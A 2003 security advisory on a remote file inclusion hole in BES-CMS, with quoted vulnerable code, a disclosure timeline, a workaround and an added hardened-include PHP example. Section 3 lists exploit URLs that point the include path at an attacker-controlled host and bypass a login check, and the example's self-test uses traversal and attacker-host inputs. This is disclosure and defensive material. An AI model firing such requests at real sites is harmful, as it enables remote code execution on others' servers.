======================================================================
Security Corporation Security Advisory [SCSA-024]
BES-CMS file inclusion vulnerability
======================================================================

PROGRAM: BES-CMS
HOMEPAGE: http://bes.h6p.org
VULNERABLE VERSIONS: 0.4 rc3, 0.5 rc3
RISK: MEDIUM/HIGH
IMPACT: Remote file inclusion (remote command execution)
RELEASE DATE: 2003-12-20

======================================================================
TABLE OF CONTENTS
======================================================================

1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6..................................................DISCLOSURE TIMELINE
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10............................................................FEEDBACK

1. DESCRIPTION
======================================================================

"Bes-cms is a professional dynamic php website building tool. It was
developed at mokka by a bored programmer. Bes-cms is capable of creating
image galleries, message boards, news sections, download sections,
contact sections and many more to be added on the plugin server."
(direct quote from the BES-CMS website)

2. DETAILS
======================================================================

- File inclusion:

A vulnerability has been discovered in BES-CMS that allows a remote
attacker to make several of its scripts include arbitrary PHP code
fetched from a server the attacker controls, which gives remote command
execution on the web server.
In index.inc.php, Members/index.inc.php and Members/root/index.inc.php
we can see the following code:

----------------------------------------------------
include_once($PATH__Includes."actions_default.php");
----------------------------------------------------

In the Include/functions_folder.php file:

----------------------------------------------------
include($PATH__Includes.'functions_folder_modules.php');
include($PATH__Includes.'functions_folder_plugins.php');
include($PATH__Includes.'functions_folder_files.php');
----------------------------------------------------

In the Include/functions_hacking.php file:

----------------------------------------------------
switch($_GET['itemID'])
{
    case 'usershow':
        include_once("".$PATH__Includes."functions_user.php");
        Show_USer_Details($_GET['user']);
        break;
[...]
    case 'send_bug':
        if ($UserDetails['LOGGED_IN'] == 'YES')
        {
            global $PATH__Includes;
            include_once("".$PATH__Includes."functions_error.php");
            send_bug_report();
        }
        break;
[...]
    case 'content_view':
        global $PATH___Includes;
        include_once("".$PATH__Includes."functions_message_docTypes.php");
        Message_Centent_View($Plugin_Path);
        break;
    case 'logger':
        global $PATH__Includes;
        include_once("".$PATH__Includes."functions_users.php");
        Loggin_Message();
        break;
    case 'search':
        global $PATH__Includes;
        include_once("".$PATH__Includes."functions_general.php");
        Display_Search_Results($_POST['search_str']);
        break;
[...]
----------------------------------------------------

(The "global $PATH___Includes;" line in the content_view case, with
three underscores, is reproduced as it appears in the source; the
include on the following line still uses $PATH__Includes.)

In the Include/functions_message.php file:

----------------------------------------------------
include($PATH__Includes.'functions_message_docTypes.php');
include($PATH__Includes.'functions_message_edit.php');
----------------------------------------------------

and in the Include/Start.php file:

-------------------------------------------
include_once($inc_path."Include/vars.php");
-------------------------------------------

All these files can be requested directly by URL, and in every one of
them the include path is built from a variable ($inc_path or
$PATH__Includes, with two underscores) that the script itself never
assigns. With register_globals=On, PHP creates that variable from any
GET, POST or cookie parameter of the same name before the script runs,
so the attacker chooses the path. Because include() and include_once()
accept URLs when allow_url_fopen is On (the default), the path can name
a host the attacker controls, and whatever PHP source that host returns
for the requested file name is executed on the target. (On PHP 5.2 and
later a URL in an include additionally requires allow_url_include=On,
which is off by default.)

3. EXPLOITS
======================================================================

- File inclusion (if register_globals=ON). The parameter name is
  PATH__Includes, with two underscores, matching the variable in the
  code:

- http://[target]/index.inc.php?PATH__Includes=http://[attacker]/
  http://[target]/Members/index.inc.php?PATH__Includes=http://[attacker]/
  http://[target]/Members/root/index.inc.php?PATH__Includes=http://[attacker]/

  Could include the file:
  http://[attacker]/actions_default.php

- http://[target]/Include/functions_folder.php?PATH__Includes=http://[attacker]/

  Could include the files:
  http://[attacker]/functions_folder_modules.php
  http://[attacker]/functions_folder_plugins.php
  http://[attacker]/functions_folder_files.php

- http://[target]/Include/functions_hacking.php?PATH__Includes=http://[attacker]/&itemID=usershow

  Could include the file:
  http://[attacker]/functions_user.php

- http://[target]/Include/functions_hacking.php?PATH__Includes=http://[attacker]/&itemID=logger

  Could include the file:
  http://[attacker]/functions_users.php
  (note the plural: the logger case includes functions_users.php, not
  functions_user.php)

- http://[target]/Include/functions_hacking.php?PATH__Includes=http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES

  Could include the file:
  http://[attacker]/functions_error.php
  (the UserDetails[LOGGED_IN]=YES parameter uses the same
  register_globals mechanism to satisfy the login check that guards
  this branch)

- http://[target]/Include/functions_hacking.php?PATH__Includes=http://[attacker]/&itemID=content_view

  Could include the file:
  http://[attacker]/functions_message_docTypes.php

- http://[target]/Include/functions_hacking.php?PATH__Includes=
  http://[attacker]/&itemID=search

  Could include the file:
  http://[attacker]/functions_general.php

- http://[target]/Include/functions_message.php?PATH__Includes=http://[attacker]/

  Could include the files:
  http://[attacker]/functions_message_docTypes.php
  http://[attacker]/functions_message_edit.php

- http://[target]/Include/Start.php?inc_path=http://[attacker]/

  Could include the file:
  http://[attacker]/Include/vars.php

In every case the attacker's server answers the request for the named
file with PHP source of its choosing (it must return the file as text
rather than execute it), and the target runs that source with the
privileges of the web server.

4. SOLUTIONS
======================================================================

A patch is available at the following link:
http://www.phpsecure.info

The author was notified and has published a fixed version, 0.5 rc4.

5. WORKAROUND
======================================================================

In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
Include/functions_folder.php, Include/functions_hacking.php and
Include/functions_message.php, add the following as the FIRST LINE:

-------------------------------------------
if (isset($_REQUEST["PATH__Includes"])){
    die("Patched by phpSecure.info");
}
-------------------------------------------

And at the beginning of the Include/Start.php file, add the following
as the FIRST LINE:

------------------------------------------------------------------------
if (isset($_REQUEST["inc_path"])){
    die("Patched by phpSecure.info");
}
------------------------------------------------------------------------

This stops the requests listed in section 3 because $_REQUEST covers
the GET, POST and cookie sources from which register_globals would
create the variable. It does not remove the underlying cause: the
scripts still read an include path they never set, and the same
mechanism still lets a request populate other unset variables such as
$UserDetails['LOGGED_IN']. Where possible, turn register_globals off
for the site (in php.ini, or with "php_flag register_globals off" in
.htaccess under Apache mod_php) and, if no feature needs to open URLs,
set allow_url_fopen = Off in php.ini so that include() cannot fetch
remote code at all.

6. DISCLOSURE TIMELINE
======================================================================

13/12/2003 Vulnerability discovered
14/12/2003 Vendor notified
15/12/2003 Vendor response
15/12/2003 Security Corporation clients notified
15/12/2003 Started e-mail discussions
20/12/2003 Last e-mail received
20/12/2003 Public disclosure

7. CREDITS
======================================================================

frog-m@n <frog-man@security-corporation.com> from http://www.phpsecure.info
is credited with this discovery
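The sturdier fix, shown here as an added example and not as BES-CMS or phpSecure.info code: derive the include directory from the script's own location, accept only a fixed list of file names, and turn the itemID switch from functions_hacking.php into a lookup table so the request never supplies a path. The bes_* function names and the BES_INCLUDE_DIR constant are invented for this example; the Include/ directory and the stub file that its self-test writes are constructed for the demonstration (the self-test needs PHP 5 or later). It addresses the root cause described in section 2, an include path read from a variable the script never assigns, rather than rejecting one parameter name as the workaround in section 5 does.

```php
<?php
// Hardened include resolution for a register_globals-era PHP application.
// Added example for this advisory; not BES-CMS or phpSecure.info code.
// The bes_* names and BES_INCLUDE_DIR are invented, and the Include/
// directory plus the stub file the self-test writes are constructed.

// 1. The include directory is derived from this file's own location and
//    fixed as a constant. A constant cannot be created or overwritten by
//    register_globals, extract() or parse_str(), so no request parameter
//    can point the include elsewhere, whatever php.ini says.
define('BES_INCLUDE_DIR', dirname(__FILE__) . DIRECTORY_SEPARATOR . 'Include' . DIRECTORY_SEPARATOR);

// 2. The only file names that may ever be included: every name the
//    advisory shows being built from $PATH__Includes or $inc_path.
function bes_allowed_includes() {
    return array(
        'actions_default.php',
        'functions_folder_modules.php', 'functions_folder_plugins.php',
        'functions_folder_files.php',
        'functions_user.php', 'functions_users.php', 'functions_error.php',
        'functions_message_docTypes.php', 'functions_message_edit.php',
        'functions_general.php',
        'vars.php',
    );
}

// Returns the absolute path of $file if it is an allowed name that resolves
// to a real file inside BES_INCLUDE_DIR, otherwise false.
function bes_resolve_include($file) {
    // Exact-match allow list: a URL, a '../' traversal or an embedded NUL
    // byte is not one of the listed strings and is rejected here.
    if (!in_array($file, bes_allowed_includes(), true)) {
        return false;
    }
    // Second check on the resolved path, in case a listed name is later
    // replaced by a symlink pointing outside the directory.
    $dir  = realpath(BES_INCLUDE_DIR);
    $path = realpath(BES_INCLUDE_DIR . $file);
    if ($dir === false || $path === false
        || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

function bes_include($file) {
    $path = bes_resolve_include($file);
    if ($path === false) {
        return false;
    }
    include_once $path;
    return true;
}

// 3. The itemID switch from functions_hacking.php as a lookup table: the
//    request selects a key, and the file name comes from this array only.
function bes_action_files() {
    return array(
        'usershow'     => 'functions_user.php',
        'send_bug'     => 'functions_error.php',
        'content_view' => 'functions_message_docTypes.php',
        'logger'       => 'functions_users.php',
        'search'       => 'functions_general.php',
    );
}

function bes_dispatch($item_id) {
    $files = bes_action_files();
    if (!is_string($item_id) || !isset($files[$item_id])) {
        return false;   // unknown or malformed itemID: nothing is included
    }
    return bes_include($files[$item_id]);
}

// 4. Self-test (php this_file.php): creates the throwaway Include/ directory
//    with one stub file and exercises the checks with the advisory's inputs.
if (PHP_SAPI === 'cli') {
    if (!is_dir(BES_INCLUDE_DIR)) {
        mkdir(BES_INCLUDE_DIR);
    }
    file_put_contents(BES_INCLUDE_DIR . 'functions_user.php',
        "<?php\nfunction Show_USer_Details(\$user) { return 'user: ' . \$user; }\n");

    $cases = array(
        array('functions_user.php',                         true),  // listed and present
        array('http://attacker.example/functions_user.php', false), // remote URL
        array('../index.inc.php',                           false), // traversal
        array("functions_user.php\0.txt",                   false), // NUL byte
        array('functions_error.php',                        false), // listed but absent
    );
    foreach ($cases as $c) {
        $ok = (bes_resolve_include($c[0]) !== false) === $c[1];
        printf("%-48s %s\n", str_replace("\0", '\0', $c[0]), $ok ? 'ok' : 'FAIL');
    }

    // A valid key includes the file, and the function it defines is callable.
    if (bes_dispatch('usershow')) {
        echo Show_USer_Details('frog-man'), "\n";
    }
    var_dump(bes_dispatch('../../etc/passwd'));   // bool(false)
}
```

Run it with php from the command line; each self-test line prints "ok" when the input is handled as intended. The allow list carries the weight, not realpath(): realpath() only confirms that a listed name still points inside the directory, and it is called after the exact match has passed, so an input containing a NUL byte or a URL never reaches it.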
8. DISCLAIMER
======================================================================

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of or
in connection with the use or spread of this information. Any use of
this information is at the user's own risk.

9. REFERENCES
======================================================================

- Original version:
  http://www.security-corporation.com/advisories-024.html
- French version:
  http://www.security-corporation.com/index.php?id=advisories&a=024-FR

10. FEEDBACK
======================================================================

Please send suggestions, updates, and comments to:

Security Corporation
http://www.security-corporation.com
advisory@security-corporation.com